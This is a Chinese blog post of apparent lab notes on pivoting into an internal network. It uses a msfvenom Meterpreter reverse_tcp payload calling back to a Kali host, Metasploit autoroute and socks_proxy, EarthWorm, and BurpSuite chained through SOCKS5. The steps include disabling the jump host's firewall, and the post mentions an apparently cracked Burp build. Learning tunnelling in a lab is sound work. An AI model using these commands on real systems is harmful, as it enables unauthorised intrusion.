纸上得来终觉浅,绝知此事要躬行。网上资料怎么写的都有,花了大半天时间整理了一下
注意事项:关闭跳板机win2012的防火墙,否则可能出现隧道无法正常使用。
ew_for_Win.exe -s ssocksd -l 1080
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.141 lport=4455 -f exe >r.exe
然后msf开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.239.141
msf6 exploit(multi/handler) > set lport 4455
msf6 exploit(multi/handler) > exploit
可以参考之前的文章:https://www.yuque.com/u1881995/pborfs/nf2nn5#rAXIQ
4.1 查看网络接口信息:run get_local_subnets
4.2 以CIDR的方式添加路由信息:run autoroute -s 192.168.195.0/24
4.3 查看活动路由列表,确认路由情况:run autoroute -p
配置socks_proxy,并运行
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > exploit
下图中可以看到,没有socks4a了,取而代之的是auxiliary/server/socks_proxy
,但是在配置选项,可以看到其支持5和4a两种,这里就用默认的5就行,不需要做额外配置,直接运行。
这个时候先缕一缕思路啊,跳板机直通内网,kali通过添加路由能间接通向内网。现在是如何让win7与kali之间建立隧道联系。在第5步中,msf开启socks连接,win7只需要把流量发到kali的1080端口即可。
我这里使用插件SwitchyOmega配置一个代理,指明协议(kali使用socks5)、kali的地址和kali监听的端口
此时让我们再来捋一下思路。
这里,就已经证明网络是通的了,下面就可以去设置BurpSuite了
这里有个问题,我要使用BurpSuite,怎么玩呢?我们知道,win7是通过socks5协议与msf建立连接的,那么,我可以让win7的浏览器走BurpSuite,BurpSuite再把流量转发给本地的Socks代理工具,再由代理工具把流量发给msf即可。如下图
上面内容是英文的,就啰嗦一下上面写的都是啥玩意吧。拿中文版的BurpSuite解释一下。
5.1 额外介绍的内容
以经典的burpsuite_pron_v2.1.07为例,安装java,激活BurpSuite之后,点击“创建桌面快捷方式.bat”,就会在桌面创建一个图标。